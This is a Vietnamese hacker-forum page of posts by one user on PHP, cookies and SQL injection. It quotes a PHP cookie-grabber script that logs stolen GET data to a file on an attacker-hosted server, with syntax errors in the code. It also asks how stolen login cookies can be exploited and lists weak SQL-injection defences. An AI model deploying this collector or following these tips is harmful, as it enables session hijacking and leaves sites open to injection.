Messages posted by: vina_man

telnet !

legendayhacker wrote:

Tác giả : W_Hat (Z0rr0)
Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi
dùng ðể lấy cookies :
Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào
ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi
file docs.php, save thành file text với tên file là hacked.txt :
Trích dẫn:
//Begin of docs.php
<?php
define ("LINE", "\r\n";
define ("HTML_LINE", "<br>";
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$ key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H : i : s ";
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "";
// file
$file = "hacked.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>

Cái này cũng hay mặc dù code hơi khó nhìn chút xíu , hj cám ơn chia xẻ . smilie

quanta wrote:

Lấy dữ liệu thì OK (search connection pooling + failover), chứ sao lại có "đồng bộ hóa dữ liệu, bảo mật, quản trị" nhỉ, cái này của sysadmin chứ.

Cám ơn anh quanta .

danchithancong wrote:

npv: em đã từng lập trình hệ thống lớn chưa(1 hệ thống lớn có nhiều server là mail server, web server, db server....khi 1 server chết thì chương trình tự kiếm đến server để lấy dữ liệu, rồi đồng bộ hóa dữ liệu, bảo mật, quản trị....)

Câu chia xẻ này hay đấy .

Code:

public static function ExecuteQuery($sql)
{
$connection = mysql_connect("host","root","root") or
die ("couldn't connect to localhost");
mysql_select_db("namedb",$connection);
mysql_query("set names 'utf8'");
$result = mysql_query($sql,$connection);
mysql_close($connection);
return $result;
}

Anh em cho hỏi mình phải code như thế nào để lấy được dữ liệu từ db server khác khi cái này die .

Cám ơn tất cả mọi người đã ý kiến và đóng góp , sẵn đây xin chúc toàn bộ anh em trên diễn đàn năm mới 2012 nhiều thành công mới và niềm vui mới .Chúc diễn đàn ngày càng phát triễn .Thân

vina_man

lovestormknx wrote:

Đọc 7 thủ thuật chống sql injection của bạn thì thấy bạn cần tìm hiểu thêm về sql injection, một số thủ thuật nghe nó "kỳ quái" và ngôn từ không chuẩn quá:

Cám ơn anh đã nhận xét đúng đắng .

lovestormknx wrote:

- Dùng hàm post thay cho hàm get trong form (vậy các website nếu không muốn bị sql injection thì chuyển hết form sang phương thức post chăng? Post, Get là phương thức của form, không phải hàm)

Em hiểu khi nào dùng Get và khi nào dùng Post ,

- Đặt biến id (biến gì?)

Mỗi table products có ít nhất 1 PK và biến ID này là biến phụ dùng để chuyển dữ liệu list products sang detall products và đặt bằng dấu " ' ".

Mấu chống của việc chống sql injection là kiểm tra và loại bỏ dữ liệu nguy hiểm mà user có thể input vào. Muốn chống hiệu quả thì phải tìm hiểu coi người ta inject sql như thế nào.

Em cũng có tìm hiểu sơ qua về các cách inject .
Ở trên em chỉ là nêu ra vắng tắt chứ còn trình bày từng cách 1 thì rất dài dòng .Hiện tại em chỉ học năm 3 và đây la site đầu tiên em viết cho tư nhân .Nên cần nhiều ý kiến để hoàn thành tốt công việc , cũng như tìm hiểu thêm về SQL - injection Cám ơn anh đã ý kiến .

Hiện tại em đang viết 1 site bằng php và muốn cài đặt cách phòng chống sql-ịnection , em có lên mạng tổng hợp một số thông tin và rút ra một số thủ thuật sau .Mong mọi người góp ý và chỉ bảo .
1. Đặt biến id = ’
2. Sử dụng error_reporting(0); ở đầu đoạn PHP để che dấu lỗi.
3.Sử dụng hàm intval : $id=intval($_GET[id]);
4.Đặt biến cho câu query : @mysql_query("SELECT * FROM abc WHERE id=$id");
5.Sử dụng hàm Post thay cho hàm Get trong form ;
6.Tạo trang bảo vệ dùng code php
7.Tạo class database chống sql-injection
Và câu hỏi của em là : Dùng cách nào là tối ưu nhất , hoặc kết hợp như thế nào để tối ưu ? Ai có ý kiến hoặc thủ thuật nào khác hay xin đóng góp .Thank mọi người nhiều .

Chào mọi người ! cho em hỏi vấn đề về cookie . Khi mình đã lấy được cookie do người dùng đăng nhập trên web thì mình có thể tận dụng được gì với cái đó(ví dụ như crack username và pass chẳng hạn) ? Mong mọi người chỉ bảo nhiệt tình .Thank all !

Rất cảm ơn mấy anh đã hướng dẫn .Chúc tất cả may mắn và hạnh phúc trong cuộc sống .

Mấy anh , chị , chú , bác và các pro hoặc ai đó đã có kinh nghiệm cho em hỏi câu này .Xin cảm ơn mọi người trước !
Câu hỏi của em là : khi tuyển dụng nhân viên lập trình(php chẳng hạn) hay một chuyên ngành nào khác về it , nhà tuyển dụng thường phỏng vấn theo quy trình như thế nào ? và dạng câu hỏi ra sao ?
PS:em còn gà con lắm , nếu có gì không hợp lý xin chém nhẹ tay . Hết !

.nếu thik bạn pm minh chỉ cho cơ bản về lập trình web php .yahoo:man_hy_vong1001 smilie

,hy vọng mấy pro đừng hack pw của em .

sử dụng task manager chọn thẻ Processes tắt nó sau đó nhanh chóng del nó .

conmale wrote:

Không có con đường nào đúng đắn cho mọi người cả. Mỗi đời người là một cuốn sách, mỗi ngày là một trang trong cuốn sách đó. Con đường thế nào là do tinh thần, tư duy, cá tính và môi trường của từng người. Những con người bình thường hay chọn đường mòn mà đi, những con người không bình thường hay chọn những con đường mới, phá đá, phá rừng mà đi.

Tại sao lại không có con đường đúng đắn ? như vậy chẳng lẽ mọi con đuòng đều sai ? làm sao biết mình là người bình thường ? người không bình thường ? xin sư huynh chỉ giáo .